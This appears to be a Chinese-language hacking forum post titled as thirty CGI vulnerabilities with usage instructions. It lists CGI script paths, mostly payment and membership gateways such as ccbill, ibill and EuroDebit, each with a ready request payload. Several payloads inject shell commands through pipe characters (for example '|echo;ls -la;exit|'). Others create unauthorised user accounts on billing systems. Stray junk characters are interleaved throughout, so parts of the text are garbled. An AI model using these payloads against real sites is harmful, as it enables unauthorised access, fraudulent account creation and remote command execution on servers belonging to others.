Cgi-bin 30个漏洞＋使用方法

admin

==============================
. T- t8 e5 D, ]  L0 x) e
/smspass.pl
username=username&password=password

5 u- ?! k) h( g9 r' S/index.cgi
wei=ren&gen=command
! S! X/ R) E% q6 V. B
* y7 j/ R# p& x/passmaster.cgi
  P6 U3 o! N/ a: xAction=Add&Username=Username&Password=Password

/accountcreate.cgi
, [2 j/ k7 m" l! C& E! |& jusername=username&password=password&ref1=|echo;ls|
$ L% x' C1 u2 c% E* m
/form.cgi
  s* Y* z7 X$ M+ Y; @" ]/ M, oname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
& Q0 R0 f/ `5 V! w/ r) Puser=username&pass=Password&confirm=Password
9 `1 D( a" h2 o: b( G
/ccbill-local.asp
( ^  U5 m" d9 X7 @post_values=username:password
7 _+ `# q& Z1 s, u% x1 b' F
: E9 w8 C* S$ N( H7 n/count.cgi
/ Y7 L9 M$ p: y( P8 @pinfile=|echo;ls -la;exit|
4 m2 ?# X5 C, g: Q1 Q5 E
/recon.cgi
/recon.cgi?search
4 b9 x6 r8 A! b( Ksearchoption=1&searchfor=|echo;ls -al;exit|

5 r+ t3 k; y6 w( E& P/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
9 s5 V" V' a% Z* t/ X/ v* O
, B1 @3 w8 w8 m, p# a/ m& ^/af.cgi
_browser_out=|echo;ls -la;exit;|
6 U& _3 o' v& z7 ]$ K$ V
! I% s5 I) E0 _! ~1 l/modify.cgi
3 N- ^/ N6 [# kusername=username&password=password&expire=30
  x! E' Z7 p+ \7 ~
/openjournal.cgi
7 l- J# N0 P( A" l# iedit=1&ct=2&go=|echo;ls -al;exit|
$ o5 C( B. w6 t' \5 f0 x
: S% i' U& d% i/gx9passwd.cgi
) S, Y+ p1 L- e5 |% Q/ Q' Hcmd=ADD&user=username&pass=password
, M  d: f& Q- N
/probecontrol.cgi
1 t/ `9 B3 C2 ]# ]5 E  P' ecommand=enable&username=username&password=password
2 L* r4 R* K3 u8 {
) e! }- j/ S1 [/recon.cgi
" G1 A" G" O  o  ]$ b& qsearchoption=3&searchfor=echo;ls -la;exit
0 w' y; w" B" w: T1 u. J- [/ B4 C
- W3 n* G7 v0 L: B7 |/htadd.pl
  J7 n8 f0 y' g* jconfigfile=|echo; ls -alt; exit

5 {  t' r3 N- V. b" O. a/gx9passwd.cgi
cmd=ADD&user=username&pass=password
. G3 S; e# O  H
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

+ Y, n- v2 A1 r+ I! g$ M: r- d& A( H/cpay.cgi
: Y+ r! k* Y& Icommand=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
! t  R/ f$ z& q) _9 m/ |
9 g0 w" l) }4 C6 K9 V/usercontrol.cgi
command=enable&username=USER&password=PASS

% z5 g- r0 a# d* K( ~+ L1 g7 l4 W/globoSALErum.cgi
: h, H4 `5 s3 q. Iaction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

& g1 V: o& U) s) ^  t& D$ d/ U  p  {/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
4 b+ v1 N2 o( {) Q  h- Hpinfile=|echo;pwd;exit|
' j# ^: q& _' R0 F, x2 u# k$ m$ p
& y* ?$ Y7 O9 X7 ]! g' u/accountcreate.cgi
. J1 u# o4 N" ]/ V; I/cgi-bin/gateway/accountcreate.cgi
. ]5 m; ^$ p, z9 z3 L2 k6 h6 N" musername=username&password=password&password2=password&ref1=|echo;ls -al;exit
& c, q: e5 K: z3 T  b) `
/af.cgi
+ ~) b: e7 R* B% U/ W+ F/env.cgi
- Q! m; z% u$ {$ eADD+;echo;pwd;exit
* f6 ]1 V6 y5 ?6 @- i4 @
/count.cgi
pinfile=|echo;pwd;exit|
8 Q: Q; X. o( e. e
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
4 }/ v0 ^# k+ i3 Q
9 J1 k6 k) K2 \; P( i/ h3 \+ u) R; ^/add.cgi
7 L! C" }& B) J( L" {; v" Qusername=username&password=password&expire=30
8 R1 ?: l+ G4 w% Z2 L+ S" y+ Y
- z1 [, X4 s( I4 u! y' w==============================
. H# h2 F5 I5 L& v